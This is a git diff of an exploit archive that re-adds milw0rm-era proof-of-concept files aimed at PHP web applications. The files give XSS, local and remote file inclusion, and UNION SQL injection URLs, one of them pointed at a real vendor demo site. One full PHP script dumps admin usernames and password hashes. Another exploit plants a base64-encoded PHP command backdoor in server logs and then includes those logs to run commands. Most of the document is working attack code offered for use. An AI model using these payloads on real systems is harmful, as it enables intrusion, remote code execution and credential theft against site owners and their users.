- -# milw0rm.com [2008-06-20] + ____ _ _ _ ___ __ _ __ + / ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _ +| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` | +| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| | + \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, | +---------------------------------------------------------------------------|___/ +Exploit found by sToRm + + +LNP: Lightweight news Portal v1.0-BETA +Multiple Remote Vulnerabilities + + +Cross-Site Scripting +-------------------- + +show_photo.php?photo="> +show_potd.php?potd="> + + +Insecure Administration +----------------------- + +The admin page faces us with a login, but many important functions are allowed +to be executed without a logged-in session. + +admin.php?A=potd_delete +admin.php?A=potd +admin.php?A=vote_update +admin.php?A=vote +admin.php?A=modifynews + + +Permanent Code Injection +------------------------ + +admin.php?A=vote + +"Current question" field allows for code injection, allowing us to force +all users browsing the poll to view an XSS or browser exploit. + + +File Upload +----------- + +admin.php?A=potd + +The "picture of the day" manager allows for further images to be +uploaded, but does not check for image validity. Although a phpshell +cannot be executed through this method, a source may be uploaded for +inclusion in further attacks, possibly an LFI somewhere on the server. + +# milw0rm.com [2008-06-20] diff --git a/platforms/php/webapps/5874.txt b/platforms/php/webapps/5874.txt index 6e56ec95b..3d4998e3a 100755 --- a/platforms/php/webapps/5874.txt +++ b/platforms/php/webapps/5874.txt 
@@ -1,36 +1,36 @@ - ____ _ _ _ ___ __ _ __ - / ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _ -| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` | -| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| | - \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, | ----------------------------------------------------------------------------|___/ -Exploit found by sToRm - -IPTBB is a free forum system built using PHP and mysql. -Local File Inclusion - -Local File Inclusion --------------------- - -index.php?act=../../../../../../etc/passwd%00 - - -function action($page){ - $page="main/".$page.".php"; - //Include the template maker - //Get the settings -$setting = array(); -$sql = mysql_query(" SELECT * FROM `iptbb_settings` "); - -while ( $row = mysql_fetch_array( $sql ) ){ - $setting["{$row['name']}"] = $row['value']; -} - - require_once('tpl.class.php'); - $tpl = new template; - $fileurl = 'templates/'; - $template = $setting['template'] . '/'; - include($page); -} - -# milw0rm.com [2008-06-20] + ____ _ _ _ ___ __ _ __ + / ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _ +| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` | +| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| | + \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, | +---------------------------------------------------------------------------|___/ +Exploit found by sToRm + +IPTBB is a free forum system built using PHP and mysql. 
+Local File Inclusion + +Local File Inclusion +-------------------- + +index.php?act=../../../../../../etc/passwd%00 + + +function action($page){ + $page="main/".$page.".php"; + //Include the template maker + //Get the settings +$setting = array(); +$sql = mysql_query(" SELECT * FROM `iptbb_settings` "); + +while ( $row = mysql_fetch_array( $sql ) ){ + $setting["{$row['name']}"] = $row['value']; +} + + require_once('tpl.class.php'); + $tpl = new template; + $fileurl = 'templates/'; + $template = $setting['template'] . '/'; + include($page); +} + +# milw0rm.com [2008-06-20] diff --git a/platforms/php/webapps/5875.txt b/platforms/php/webapps/5875.txt index 547f8da58..fd2c128e4 100755 --- a/platforms/php/webapps/5875.txt +++ b/platforms/php/webapps/5875.txt 
@@ -1,50 +1,50 @@ -######################################################################### -#################### Viva IslaM Viva IslaM ############################## -## -## Remote SQL Injection Vulnerability -## -## CiBlog 3.1 ( links-extern.php id ) -## -######################################################################### -######################################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM -## -## Email : SQL@Hotmail.it -## -## !! SYRIAN HaCkErS !! -######################## -######################## -## -## Script : CiBlog 3.1 -## -## site : www.cistyle.de -## -######################## -######################## -## -## -(:: SQL ::)- -## -## www.site.com/ -## links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/* -## -## -(:: L!VE DEMO ::)- -## -## http://www.cistyle.de/demo/links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/* -## -####################### -####################### - - -####################################################################################################### -####################################################################################################### - - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-06-20] +######################################################################### +#################### Viva IslaM Viva IslaM ############################## +## +## Remote SQL Injection Vulnerability +## +## CiBlog 3.1 ( links-extern.php id ) +## +######################################################################### +######################################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM +## +## Email : SQL@Hotmail.it +## +## !! SYRIAN HaCkErS !! +######################## +######################## +## +## Script : CiBlog 3.1 +## +## site : www.cistyle.de +## +######################## +######################## +## +## -(:: SQL ::)- +## +## www.site.com/ +## links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/* +## +## -(:: L!VE DEMO ::)- +## +## http://www.cistyle.de/demo/links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/* +## +####################### +####################### + + +####################################################################################################### +####################################################################################################### + + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-06-20] 
diff --git a/platforms/php/webapps/5876.txt b/platforms/php/webapps/5876.txt index 11ec3f5b1..af6f95803 100755 --- a/platforms/php/webapps/5876.txt +++ b/platforms/php/webapps/5876.txt @@ -1,18 +1,18 @@ -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -Scripts : CMS Jamroom Version: 3.3.5 -Discovered By : Cyberlog -Scripts site : http://www.jamroom.net/ -Download Script : http://www.jamroom.net/index.php?m=td_download&o=download&file_id=43 -Thanks To : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree -Special To : k1n9k0ng, adhietslank, sukam, cah_gemblunkz, the_sims, aRiee - letjen, k1tk4t, inouf and jayoes -Site : www.sekuritionline.net -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - -bug Script: -require_once("{$jamroom['jm_dir']}/include/jamroom-payment.inc.php"); - -Bug Found: -http://www.site.com/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=[shell] - -# milw0rm.com [2008-06-20] ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +Scripts : CMS Jamroom Version: 3.3.5 +Discovered By : Cyberlog +Scripts site : http://www.jamroom.net/ +Download Script : http://www.jamroom.net/index.php?m=td_download&o=download&file_id=43 +Thanks To : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree +Special To : k1n9k0ng, adhietslank, sukam, cah_gemblunkz, the_sims, aRiee + letjen, k1tk4t, inouf and jayoes +Site : www.sekuritionline.net ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +bug Script: +require_once("{$jamroom['jm_dir']}/include/jamroom-payment.inc.php"); + +Bug Found: +http://www.site.com/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=[shell] + +# milw0rm.com [2008-06-20] diff --git a/platforms/php/webapps/5877.txt b/platforms/php/webapps/5877.txt index a71eb8453..0649418e4 100755 --- a/platforms/php/webapps/5877.txt +++ b/platforms/php/webapps/5877.txt 
@@ -1,81 +1,81 @@ -=============================================================== - JaxUltraBB <= 2.0 (LFI/XSS) Multiple Remote Vulnerabilities -=============================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 20 June 2008 -SITE : www.citec.us - - -##################################################### - APPLICATION : JaxUltraBB - VERSION : <= 2.0 - DOWNLOAD : http://downloads.sourceforge.net/jubb/ -##################################################### - ---- Local File Inclusion --- - ------------------------------------ - Vulnerable File [viewprofile.php] ------------------------------------ -@Line 8-9 - - 8: $userfile = file_get_contents("users/".$_GET['user'].".JaxSQL"); - 9: $onlinefile = file_get_contents("users/".$_GET['user']."online.JaxSQL"); - --------------- - POC Exploits --------------- - -[+] http://192.168.24.25/jubb/viewprofile.php?user=../../../../../../../../boot.ini%00 - - - This exploit will open boot.ini in system file: - -[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) -\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) -\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect - - You can change boot.ini to /etc/passwd%00 in linux OS. 
- - ---- Remote XSS Exploit --- - ---------------------------------- - Vulnerable File [viewforum.php] ---------------------------------- - -@Line - - 14: $forum = $_GET['forum']; - - 15: online_moved("Viewing ".$_GET['forum']); - - 17: $forumfile = fopen("topics/".$forum."topics.JaxSQL", "at"); - 18: $topicsfile = file_get_contents("topics/".$forum."topics.JaxSQL", "at"); - 19: echo "


    REQUEST TIMERESPONSE TIMETRUETIMEBENCHMARKRESULTIPFIELDCHARSETSUBSTR()ORD()CHAR() ".htmlentities($bef)."  ".htmlentities($aft)."  ".htmlentities($truetime)."  ".htmlentities($benchmark)."  ".htmlentities($result)."  ".htmlentities($fakeip)."  ".htmlentities($dafield)."  ".htmlentities("$a-$b")."  ".htmlentities($sub)."  ".htmlentities($f)."  ".htmlentities(chr($f))." 
    ",$temp[1]); + $imageid=$temp2[0]; + + echo "\r\n[+] Image ID Retrieved..." . $imageid . "!\n";} + + else{echo "\r\n[-] Cannot retrieve a valid image ID...\n"; footer(); exit;} + + + $data="comments=Your+about+to+get+owned%21"; + $data.="&do=comment"; + $data.="&commentid="; + $packet ="POST " . $p . "viewimage.php?imageid=" . $imageid . " HTTP/1.1\r\n"; + $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Content-Length: ".strlen($data)."\r\n"; + $packet.="Cookie: " . $cookie . "\r\n"; + $packet.="Connection: Close\r\n\r\n"; + $packet.=$data; + + sendpacketii($packet); + + if (strstr($html,"Comments posted successfully!")){echo "[+] Posting comment...Done!\n";} + else{echo "[-] Posting comment...Failed!\n"; footer(); exit;} + + $sqlArray = array( +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,54),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,55),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,56),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", 
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,57),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,48),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,49),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,50),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,51),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*" +); + +for ($i=0; $i<=count($sqlArray); $i++){ + + $packet ="GET " . $p . $sqlArray[$i] . " HTTP/1.1\r\n"; + $packet.="Host: " . $host . "\r\n"; + $packet.="Cookie: " . $cookie . 
"\r\n"; + $packet.="Connection: Close\r\n\r\n"; + sendpacketii($packet); + + if (strstr($html,"name=\"comments\">Username=")){ + $temp3=explode("id=\"comments\" name=\"comments\">Username=",$html); + $temp4=explode(":",$temp3[1]); + $ret_user=$temp4[0]; + + echo "\r\n[+] Admin User: " . $ret_user;} + + + elseif (strstr($html,"404")){ + echo "\r\n[-] Image ID is not valid, please try another!"; footer(); exit;} + else{} +} + + $sqlArray = array( +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,54),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,55),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,56),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,57),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", 
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,48),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,49),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,50),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*", +"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,51),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*" +); + +for ($i=0; $i<=count($sqlArray); $i++){ + + $packet ="GET " . $p . $sqlArray[$i] . " HTTP/1.1\r\n"; + $packet.="Host: " . $host . "\r\n"; + $packet.="Cookie: " . $cookie . "\r\n"; + $packet.="Connection: Close\r\n\r\n"; + sendpacketii($packet); + + if (strstr($html,":Hash=")){ + $temp3=explode("Hash=",$html); + $temp4=explode("</textarea>",$temp3[1]); + $ret_hash=$temp4[0]; + + echo "\r\n[+] Admin User: " . $ret_hash . "\n";} + else{} +} + +footer(); + +?> + +# milw0rm.com [2007-06-01] diff --git a/platforms/php/webapps/4022.htm b/platforms/php/webapps/4022.htm index 26b9b2606..90b72afcc 100755 --- a/platforms/php/webapps/4022.htm +++ b/platforms/php/webapps/4022.htm 
@@ -1,83 +1,83 @@ - - - -XOOPS Module icontent v.1.0 Remote File Inclusion Exploit - - - - - - -
    - -

    XOOPS Module icontent -v.1.0 Remote File Inclusion Exploit

    - -

    - - Target:[http://[target]/[scriptpath] -   -

    -

    - -


    - -

    - -Mahmood_ali

    - -TrYaG-Team

    -

    -
    - - - - -# milw0rm.com [2007-06-01] + + + +XOOPS Module icontent v.1.0 Remote File Inclusion Exploit + + + + + + +
    + +

    XOOPS Module icontent +v.1.0 Remote File Inclusion Exploit

    + +

    +
    + Target:[http://[target]/[scriptpath] +   +

    +

    +
    +


    + +

    + +Mahmood_ali

    + +TrYaG-Team

    +

    +
    + + + + +# milw0rm.com [2007-06-01] diff --git a/platforms/php/webapps/4025.php b/platforms/php/webapps/4025.php index 51bd763ea..422689c5d 100755 --- a/platforms/php/webapps/4025.php +++ b/platforms/php/webapps/4025.php 
@@ -1,374 +1,374 @@ - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; - -function wyslijpakiet($pakiet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$pakiet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); -} -$host=$argv[1]; -$path=$argv[2]; -$port=80; -$proxy=""; -$login="admin"; -$haslo="admin"; -$cmd=""; -for ($i=3; $i<$argc; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>'-p') and ($temp<>'-P')) {$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -if ($temp=="-L") -{ - $login=str_replace("-L","",$argv[$i]); -} -if ($temp=="-H") -{ - $haslo=str_replace("-H","",$argv[$i]); -} -} -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'bad patch!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} -/* -how its works :) - -in file "config/general.php" lines 12-33: - -################################################################################ -$config['dir_config'] = 
'config/'; -$config['dir_core'] = 'core/'; -$config['dir_db'] = 'db/'; -$config['dir_js'] = 'js/'; -$config['dir_libraries'] = 'libraries/'; -$config['dir_tpl'] = 'templates/'; -$config['dir_files'] = 'files/'; -$config['dir_ext'] = 'ext/'; -$config['dir_plugins'] = 'plugins/'; -$config['dir_lang'] = 'lang/'; - -if( isset( $sLang ) && is_file( $config['dir_lang'].$sLang.'.php' ) && strlen( $sLang ) == 2 ){ - setCookie( 'sLanguage', $sLang, time( ) + 86400 ); - define( 'LANGUAGE', $sLang ); -} -else{ - if( isset( $_COOKIE['sLanguage'] ) ) <-------------------------[^] - define( 'LANGUAGE', $_COOKIE['sLanguage'] ); <-------------------------[^^] - else - define( 'LANGUAGE', $config['default_lang'] ); -} -################################################################################ - -and in index.php we can find line 32: - -################################################################################ -require_once DIR_LANG.LANGUAGE.'.php'; <-------------------------[^^^] -################################################################################ - -we can define LANGUAGE string. - -Now how remote code execution: - -in admin panel can upload any file on serwer, if you have admin login and password. Default admin login and password in script is "admin" many users dont change it!! -They don't edit file "config/general.php" lines 75-76: -$config['login'] = "admin"; -$config['pass'] = "admin"; - -;) - -Elo :) -*/ - -echo "insert evil code in logfiles to run local include ...\r\n\r\n"; -$hauru2 = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL". -"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS". -"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB". -"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj". -"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI". -"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX". 
-"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+"); -$pakiet="GET ".$p.$hauru2." HTTP/1.0\r\n"; -$pakiet.="User-Agent: ".$hauru2." Googlebot/2.1\r\n"; -$pakiet.="Host: ".$host."\r\n"; -$pakiet.="Connection: close\r\n\r\n"; -wyslijpakiet($pakiet); -sleep(1); -$paths= array ( -"../../../../../var/log/httpd/access_log", -"../../../../../var/log/httpd/error_log", -"../apache/logs/error.log", -"../apache/logs/access.log", -"../../apache/logs/error.log", -"../../apache/logs/access.log", -"../../../apache/logs/error.log", -"../../../apache/logs/access.log", -"../../../../apache/logs/error.log", -"../../../../apache/logs/access.log", -"../../../../../apache/logs/error.log", -"../../../../../apache/logs/access.log", -"../logs/error.log", -"../logs/access.log", -"../../logs/error.log", -"../../logs/access.log", -"../../../logs/error.log", -"../../../logs/access.log", -"../../../../logs/error.log", -"../../../../logs/access.log", -"../../../../../logs/error.log", -"../../../../../logs/access.log", -"../../../../../etc/httpd/logs/access_log", -"../../../../../etc/httpd/logs/access.log", -"../../../../../etc/httpd/logs/error_log", -"../../../../../etc/httpd/logs/error.log", -"../../../../../var/www/logs/access_log", -"../../../../../var/www/logs/access.log", -"../../../../../usr/local/apache/logs/access_log", -"../../../../../usr/local/apache/logs/access.log", -"../../../../../var/log/apache/access_log", -"../../../../../var/log/apache/access.log", -"../../../../../var/log/access_log", -"../../../../../var/www/logs/error_log", -"../../../../../var/www/logs/error.log", -"../../../../../usr/local/apache/logs/error_log", -"../../../../../usr/local/apache/logs/error.log", -"../../../../../var/log/apache/error_log", -"../../../../../var/log/apache/error.log", -"../../../../../var/log/access_log", -"../../../../../var/log/error_log" -); -for ($i=0; $i<=count($paths)-1; $i++) -{$a=$i+2; -echo "[".$a."] Check Path: ".$paths[$i]."\r\n"; -echo "remote code execution...wait..\n"; -$pakiet 
="GET ".$p."index.php HTTP/1.1\r\n"; -$pakiet.="Cookie: sLanguage=../".$paths[$i]."%00;\r\n"; -$pakiet.="HAURU: ".$cmd."\r\n"; -$pakiet.="Host: ".$host."\r\n"; -$pakiet.="Connection: Close\r\n\r\n"; -wyslijpakiet($pakiet); -if (strstr($html,"Hauru")) -{$temp=explode("Hauru",$html); -die($temp[1]); -}else{echo "can't run evil code :/ ..\n";}} -$data ="_POST[sLogin]=".$login."&_POST[sPass]=".$haslo."&submit=sign%20in%20»"; -$pakiet ="POST ".$p."admin.php?p=login HTTP/1.0\r\n"; -$pakiet.="Host: ".$host."\r\n"; -$pakiet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\r\n"; -$pakiet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$pakiet.="Content-Length: ".strlen($data)."\r\n"; -$pakiet.="Accept: text/plain\r\n"; -$pakiet.="Connection: Close\r\n\r\n"; -$pakiet.=$data; -wyslijpakiet($pakiet); -$temp=explode("Set-Cookie: ",$html); -$cookie=""; -for ($i=1; $i - -# milw0rm.com [2007-06-02] + 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; + +function wyslijpakiet($pakiet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$pakiet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); +} +$host=$argv[1]; +$path=$argv[2]; +$port=80; +$proxy=""; +$login="admin"; +$haslo="admin"; +$cmd=""; +for ($i=3; $i<$argc; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>'-p') and ($temp<>'-P')) {$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +if ($temp=="-L") +{ + $login=str_replace("-L","",$argv[$i]); +} +if ($temp=="-H") +{ + $haslo=str_replace("-H","",$argv[$i]); +} +} +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'bad patch!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} +/* +how its works :) + +in file "config/general.php" lines 12-33: + +################################################################################ 